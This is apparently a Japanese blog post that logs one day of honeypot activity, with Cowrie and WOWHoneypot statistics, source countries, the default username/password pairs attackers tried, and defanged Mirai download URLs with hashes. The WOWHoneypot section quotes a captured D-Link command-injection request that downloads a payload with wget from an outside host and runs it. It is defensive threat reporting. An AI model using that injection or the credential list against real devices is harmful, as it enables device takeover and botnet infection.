cute_otter’s blog

ハニーポットの観察日記を付けています

トップ > ハニーポット観察日記 > ハニーポット観察日記(2019/01/12) 「イタリアからのアクセス件数が大幅に減少」

ハニーポット観察日記(2019/01/12) 「イタリアからのアクセス件数が大幅に減少」

ハニーポット観察日記

はじめに

こんにちは。cute_otterです。
この三連休中にWOWHoneypotのログビュワーの機能を拡充したいなぁ

Cowrie

ハニーポット「Cowrie」で2019/01/12 (土) 00:00~23:59 UTC(運用60日目)に取得したログの簡易分析です。

概況

本日より新たにスキャンと思われるセッションの項目を追加しました。

  • 集計期間 : 2019/01/12 (土) 00:00~23:59 UTC
  • 総イベント件数 : 609,055 件 (前日比 -82,787 件)
    • コマンド実行成功 : 251,800 件 (前日比 -47,651 件)
    • コマンド入力 : 208,353 件 (前日比 -27,028 件)
    • ファイルダウンロード成功 : 38,184 件 (前日比 -7,594 件)
    • 新しいコネクション : 28,521 件 (前日比 +494 件)
    • セッションクローズ : 28,505 件 (前日比 +504 件)
    • コマンド実行失敗 : 12,611 件 (前日比 -236 件)
    • ログイン成功 : 8,883 件 (前日比 -357 件)
    • 外部へのTCP/IPリクエストの送出 : 7,175 件 (前日比 -696 件)
    • Cowrieによってエミュレートされたアーキテクチャ : 5,775 件 (前日比 -295 件)
    • TTYログ取得終了 : 5,761 件 (前日比 -295 件)
    • ファイルダウンロード失敗 : 4,264 件 (前日比 -840 件)
    • クライアントのSSHバージョン : 3,505 件 (前日比 +34 件)
    • SSH鍵交換 : 3,497 件 (前日比 +29 件)
    • ログイン失敗 : 1,608 件 (前日比 +1,356 件)
    • 外部へのTCP/IPデータの送出 : 609 件 (前日比 -200 件)
    • ターミナルサイズ : 4 件 (前日比 -4 件)
  • ログイン試行 : 10,491 件 (前日比 +999 件)
  • SSHコネクション : 12,118 件 (前日比 +385 件)
  • Telnetコネクション : 16,403 件 (前日比 +109 件)
  • ユニークIPアドレス : 397 件 (前日比 -11 件)
  • アクセス元の国 : 57 カ国 (前日比 -7 カ国)
  • TTY : 5,761 件 (前日比 -295 件)
  • スキャンと思われるセッション : 17,431 件 (前日比 +848 件)

特徴

  • 総イベント件数が減少しました。
    • 前日より8万3,000件ほど減少しました。
  • ログイン試行件数が増加しました。
    • 前日より1,000件ほど増加しました。
  • スキャンと思われるセッションの件数が増加しました。
    • 前日より850件ほど増加しました。
  • イタリアからのアクセス件数が大幅に減少しました。
    • 前日より17万6,000件ほど減少しました。

ダッシュボード

ダッシュボードは以下の通りです。

ダッシュボード(2019/01/12)
ダッシュボード(2019/01/12)

国別のアクセス件数

国別のアクセス件数の変遷は以下の通りです。

国別のアクセス件数の変遷(2019/01/12)
国別のアクセス件数の変遷(2019/01/12)

続いて、国別のアクセス件数(上位20位)は以下の通りです。

順位 国名 件数 前日の順位 前日の件数 件数差 備考
1. United States 461,440 1. 373,447 +87,993 -
2. Italy 100,946 2. 276,857 -175,911 -
3. United Kingdom 16,172 3. 15,649 +523 -
4. Ireland 8,734 4. 8,751 -17 -
5. Unknown 5,754 5. 5,496 +258 -
6. Singapore 3,590 6. 4,348 -758 -
7. Germany 3,291 25. 63 +3,228 -
8. India 2,575 19. 144 +2,431 -
9. Russia 1,400 7. 1,682 -282 -
10. Latvia 1,211 13. 282 +929 -
11. China 521 8. 960 -439 -
12. Vietnam 503 12. 399 +104 -
13. Romania 476 17. 186 +290 -
14. Republic of Korea 410 20. 140 +270 -
15. Canada 333 10. 537 -204 -
16. Sweden 271 14. 276 -5 -
17. Colombia 203 30. 24 +179 -
18. France 185 9. 557 -372 -
19. Bulgaria 178 - 0 +178 -
20. Brazil 125 18. 185 -60 -
  • 3日連続で全体的にアクセス件数が減少しました。本日は特にイタリアからのアクセス件数が減少しました。
  • イタリアからのアクセス件数が前日より17万6,000件ほど減少しました。
    • 0~2時にアクセスが集中していました。
  • アメリカからのアクセス件数が前日より8万8,000件ほど増加しました。
  • ドイツからのアクセス件数が前日より3,200件ほど増加しました。
  • インドからのアクセス件数が前日より2,400件ほど増加しました。
    • インドからのアクセスのうち約90%が12時に集中していました。
イタリアからのアクセス件数の変遷

イタリアからのアクセス件数の変遷(2018/12/24~2019/01/12)は以下の通りです。

イタリアからのアクセス件数の変遷(2018/12/24~2019/01/12)
イタリアからのアクセス件数の変遷(2018/12/24~2019/01/12)

2018/12/26から件数が増加し始め、2018/12/28に、一時的に件数が6万件台まで減少しました。
しかし、2018/12/29から再び件数が増加し始め、2018/12/30~2019/01/01にかけて、連日30万件以上のアクセスがありました。
2019/01/02には件数が大幅に減少し、430件となりましたが、2019/01/03から再び増加し始め、2019/01/04には327,194件となりました。
2019/01/05は8万件ほど減少しましたが、2019/01/06には525,601件となり、過去最大となりました。 2019/01/07~08にかけて件数が減少しましたが、2019/01/09~10にかけて30万件以上のアクセスがありました。 2019/01/11以降、件数が減少しています。

国別のログイン試行

国別のログイン試行の件数(上位20位)は以下の通りです。

順位 国名 件数 前日の順位 前日の件数 件数差 備考
1. United States 4,381 1. 3,315 +1,066 -
2. United Kingdom 1,720 3. 1,798 -78 -
3. India 1,401 12. 18 +1,383 -
4. Ireland 1,295 4. 1,240 +55 -
5. Italy 932 2. 2,530 -1,598 -
6. Russia 157 5. 161 -4 -
7. Germany 141 14. 11 +130 -
8. Singapore 85 6. 99 -14 -
9. China 65 7. 92 -27 -
10. Republic of Korea 38 19. 6 +32 -
11. Canada 33 13. 17 +16 -
12. Vietnam 31 8. 28 +3 -
13. Latvia 26 18. 6 +20 -
14. Sweden 26 10. 23 +3 -
15. France 25 9. 23 +2 -
16. Bulgaria 20 -
17. Indonesia 12 36. 2 +10 -
18. Brazil 12 11. 18 -6 -
19. Romania 12 20. 6 +6 -
20. Colombia 7 27. 3 +4 -
  • アメリカからのログイン試行件数が前日より1,100件ほど増加しました。
  • インドからのログイン試行件数が前日より1,400件ほど増加しました。
  • イタリアからのログイン試行件数が前日より1,600件ほど減少しました。

ログイン試行で使用されたユーザ名とパスワード

ログイン試行の際に使用されたユーザ名とパスワードの組み合わせ(上位20位)は以下の通りです。

順位 ユーザ名 パスワード 件数 前日の順位 前日の件数 件数差 備考
1. admin admin 3,175 1. 3,207 -32 -
2. root 88888888 462 2. 882 -420 DVRを狙ったものと思われる(参照)
3. enable system 460 34. 18 +442 -
4. shell sh 456 38. 16 +440 -
5. root (空欄) 307 8. 199 +108 -
6. root vizxv 262 9. 193 +69 Zhejiang Dahua Technology製のカメラを狙ったものと思われる(参照)
7. root 666666 253 7. 214 +39 Zhejiang Dahua Technology製のカメラを狙ったものと思われる(参照)
8. guest 123456 238 4. 440 -202 -
9. root GM8182 236 3. 441 -205 Grain Media製のDVRを狙ったものと思われる(参照)
10. admin admin1 230 6. 433 -203 -
11. support 1234 227 5. 438 -211 -
12. user user 208 11. 169 +39 -
13. root pass 201 10. 171 +30 Axis製のIPカメラを狙ったものと思われる(参照)
14. root 123456 180 19. 114 +66 -
15. root 888888 179 15. 139 +40 Zhejiang Dahua Technology製のDVRを狙ったものと思われる(参照)
16. root system 174 13. 147 +27 IQinVision製のIPカメラを狙ったものと思われる(参照)
17. support support 168 14. 143 +25 -
18. root xc3511 163 16. 139 +24 HiSilicon Technologies製のIPカメラを狙ったものと思われる(参照)
19. root 1234 153 12. 157 -4 -
20. admin 4321 144 18. 137 +7 -
  • admin/adminの組み合わせのほとんどがイギリスアイルランドからのログイン試行の際に使用されていました。
    • イギリスが1,656件(3,175件中)、アイルランドが1,290件(3,175件中)でした。
  • root/88888888root/GM8182guest/123456support/1234admin/admin1の組み合わせのほとんどがイタリアからのログイン試行の際に使用されていました。
    • root/88888888は306件(462件中)でした。
    • guest/123456は151件(238件中)でした。
    • root/GM8182は155件(236件中)でした。
    • admin/admin1は153件(230件中)でした。
    • support/1234は149件(227件中)でした。

ダウンロードされたファイル

ダウンロードされたファイルは以下の通りです。

※VT : VirusTotal

順位 ダウンロード元 MD5 検出率(VT) 件数 備考
1. hxxp://198[.]98[.]62[.]237:80/bins/mirai[.]x86 4147e375f325878fe3c3962c3d4ac411 37/57 2,779 Mirai
2. hxxp://195[.]231[.]0[.]120:80/AB4g5/Josho[.]x86 d5f9953e5209ebe670208ff55155fa6e 20/59 897 Mirai
3. hxxp://209[.]141[.]43[.]15:80/bins/mirai[.]x86 256e4d3c013fe49c6166da2d3ba0c524 20/58 266 Mirai
4. hxxp://178[.]128[.]214[.]44:80/Kuso69/Akiru[.]x86 0f6fa2e22d9de3864e7d60ed6c0cb4b5 33/57 77 Gafgyt| or Mirai
5. hxxp://159[.]65[.]190[.]9:80/Binarys/Owari[.]x86 e01733ef09a20256ada587920dc8de5f 24/59 45 Mirai
6. hxxp://185[.]244[.]25[.]233/8UsA[.]sh 9a75838c7c303d7946dda48f41c72717 25/58 38 Mirai(ダウンローダー)
7. hxxp://209[.]97[.]185[.]168:80/bins/kirai[.]x86 3906a2f9b3192664762e3f6eb84f4c18 27/58 30 Mirai
8. hxxp://46[.]183[.]218[.]243:80/33bi/Ares[.]x86 e68bd8a8712ce1788faa15c9813c00ab 20/57 25 Mirai
9. hxxp://207[.]154[.]193[.]227:80/bins/Damien[.]x86 2db43f53e5c60b2fc54ff18904688261 14/60 15 Mirai
10. hxxp://207[.]154[.]193[.]227:80/bins/Damien[.]x86 afb4b7d8bd56974d5fcdd0979bc00a96 12/60 13 Mirai
11. hxxp://139[.]59[.]25[.]145:80/bins/sora[.]x86 e4ae3f23bbdbcb67b52be4616ffe280b 21/57 10 Mirai
12. hxxp://207[.]154[.]193[.]227:80/bins/Damien[.]x86 b0f07d4686797d3fd775ce9c5f94bc16 15/58 10 Mirai
13. hxxp://185[.]172[.]110[.]213/bins[.]sh c3d5df1e99c83f3c5fa42371e2091121 24/59 7 Mirai|(ダウンローダー)
14. hxxp://193[.]148[.]69[.]33:80/bins/telnet[.]x86 f81cb52b13c0ad74247db720ffe5fa36 23/57 7 Mirai
15. hxxp://194[.]36[.]173[.]4:80/vi/x86[.]bushido 236cc078eb84e9e14f1112a52e74abc9 35/60 7 Mirai
16. hxxp://149[.]248[.]56[.]218:80/OwO/Tsunami[.]x86 23425d830ec98cc0322e91bc5935ac81 22/57 6 Mirai
17. hxxp://104[.]248[.]114[.]222:80/bins/penthouse[.]x86 c0bdcfb11515c1de5e3be7c0a417fb05 22/60 4 Mirai
18. hxxp://80[.]211[.]101[.]178:80/8x868 6f6a163f1193fc9b651b3f3203c9c01a 7/58 3 Gafgyt
19. hxxp://35[.]235[.]102[.]123:80/bins/telnet[.]x86 12747042919cf473e147c0201773bed9 22/58 3 Mirai
20. hxxp://80[.]211[.]101[.]178/8UsA[.]sh e01e83c7ba252b8acef21dafe14f5b37 24/59 2 Mirai(ダウンローダー)
21. hxxp://195[.]231[.]6[.]19:80/bins/hoho[.]x86 711b2f048b149bd350aea7cefccba74e 20/60 2 Mirai
22. hxxp://185[.]141[.]24[.]211:80/bins/x86 10dca4ac870088e4fc710d9639fc888e 17/58 1 Mirai
23. hxxp://80[.]211[.]101[.]178:80/bins/hoho[.]x86 b9a2ac621ca6ab08f00550825be4c64c 21/59 1 Mirai
  • Mirai(亜種含む)やGafgyt(亜種含む)と思われるファイルがダウンロードされていました。

IRCボット

前日まで5日連続してRaspberry Piを狙ったと思われるIRCボットを観測していましたが、本日は観測されませんでした。

Cowrieで取得したログの簡易分析は以上です。

WOWHoneypot

続いて、ハニーポット「WOWHoneypot」で2019/01/12 (土) 00:00~23:59 UTC(運用9日目)に取得したログの簡易分析です。
2019/01/11のWOWHoneypotのログの取得ができなかったので、前日比は記載していません。

概況

  • 集計期間 : 2019/01/12 (土) 00:00~23:59 UTC
  • 総アクセス件数 : 13 件 (前日比 - 件)
  • ユニークIPアドレス件数 : 12 件 (前日比 - 件)
  • アクセス元の国数 : 10 カ国 (前日比 - 件)

特徴

  • 過去最低のアクセス件数でした。
  • 普段アクセス件数が数百件ある中国からのアクセスが1件しかありませんでした。

国別のアクセス件数

国別のアクセス件数(上位5位)は以下の通りです。

順位 国名 件数 前日の順位 前日の件数 件数差 備考
1. Brazil 3 - - - -
2. Greece 2 - - - -
3. Indonesia 1 - - - -
4. Italy 1 - - - -
5. United Kingdom 1 - - - -
  • 一昨日までは中国からのアクセスが数百件ありましたが、本日は1件だけ観測しました。

メソッド

メソッドの件数は以下の通りです。

順位 メソッド 件数 前日の順位 前日の件数 件数差 備考
1. GET 13 - - - -

HTTPバージョン

HTTPバージョンの件数は以下の通りです。

順位 HTTPバージョン 件数 前日の順位 前日の件数 件数差 備考
1. HTTP/1.1 12 - - - -
2. HTTP/1.0 1 - - - -

アクセス先

アクセス先は以下の通りです。

順位 アクセス先 件数 前日の順位 前日の件数 件数差 備考
1. GET / HTTP/1.1 9 - - - トップページへのアクセス
2. GET /mysql/admin/index.php?lang=en HTTP/1.1 2 - - - phpMyAdminの探査
3. GET / HTTP/1.0 1 - - - トップページへのアクセス
4. GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://50[.]115[.]166[.]136/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1 1 - - - D-Link製のルーター脆弱性(OSコマンドインジェクション)を狙った攻撃と思われる。User-AgentはHakai/2.0でした。
  • 6日ぶりにD-Link製のルーターを狙った攻撃を観測しました。

WOWHoneypotで取得したログの簡易分析は以上です。